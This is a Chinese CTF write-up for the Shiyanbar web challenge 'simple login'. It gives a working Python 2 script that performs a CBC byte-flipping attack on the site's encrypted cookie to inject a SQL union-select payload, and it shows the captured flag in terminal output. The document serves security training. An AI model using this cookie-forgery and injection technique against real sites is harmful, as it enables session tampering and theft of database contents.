实验吧WEB-简单的登录题

此题考点:cbc字节反转攻击。
解题脚本如下:

#coding:utf-8
#python2
#cbc字节反转攻击
import requests,base64,urllib,math

def work():
    url = 'http://ctf5.shiyanbar.com/web/jiandan/index.php'
    payload = '0 union select 1,value,3 from you_want limit 1#'  
    #payload = 'x'*20

    plaintext = 'a:1:{s:2:"id";s:%d:"%s";}'%(len(payload),payload)
    badText = 'x'*16
    if len(plaintext)%16:
        if len(plaintext)%16>3:
            badText = 'x'*(len(plaintext)%16-3)+'";}'
        elif len(plaintext)%16 == 3:
            badText = '";}'
        elif len(plaintext)%16 == 1:
            badText = '}'
        else:
            badText = ';}'
    r = requests.post(url,data={'id':'x'*len(payload)})
    sc = r.headers['Set-Cookie'].split(',')

    iv = 'a'*16
    cipher = sc[1][sc[1].find('=')+1:]
    blockNum = len(cipher)/16
    cipher = base64.b64decode(urllib.unquote(cipher))
    blockNum = len(cipher)/16
    cipherBlock = [iv]
    cipherBlock += [cipher[16*i:16*(i+1)] for i in xrange(blockNum)]
    plainBlock = [plaintext[16*i:16*(i+1)] for i in xrange(blockNum)]

    for i in xrange(blockNum-1,-1,-1):
        s1 = plainBlock[i]
        s2 = cipherBlock[i]
        tmp = ''

        for j in xrange(len(s1)):
            tmp += chr(ord(s1[j])^ord(badText[j])^ord(s2[j]))

        cipherBlock[i]=tmp+s2[len(tmp):]
        if i == 0:
            iv = cipherBlock[0]

        iv_new = urllib.quote(base64.b64encode(iv))
        cipher_new = urllib.quote(base64.b64encode(''.join(cipherBlock[1:])))
        headers={'Cookie':'iv={};cipher={}'.format(iv_new,cipher_new)}

        r = requests.get(url,headers=headers)

        if i != 0: 
            tmp = r.text[r.text.find('decode')+8:r.text.rfind("')")]
            badText = base64.b64decode(tmp)[16*(i-1):16*i]
        else:
            print r.text.encode('gb18030')

work()
root@vm-kali:~/Documents# /usr/bin/python /root/Documents/cbc.py
�0�7�0�3�0�7

Hello!flag{c42b2b758a5a36228156d9d671c37f19}

参考:https://blog.csdn.net/kostart123/article/details/81222989

你可能感兴趣的:(实验吧WEB-简单的登录题)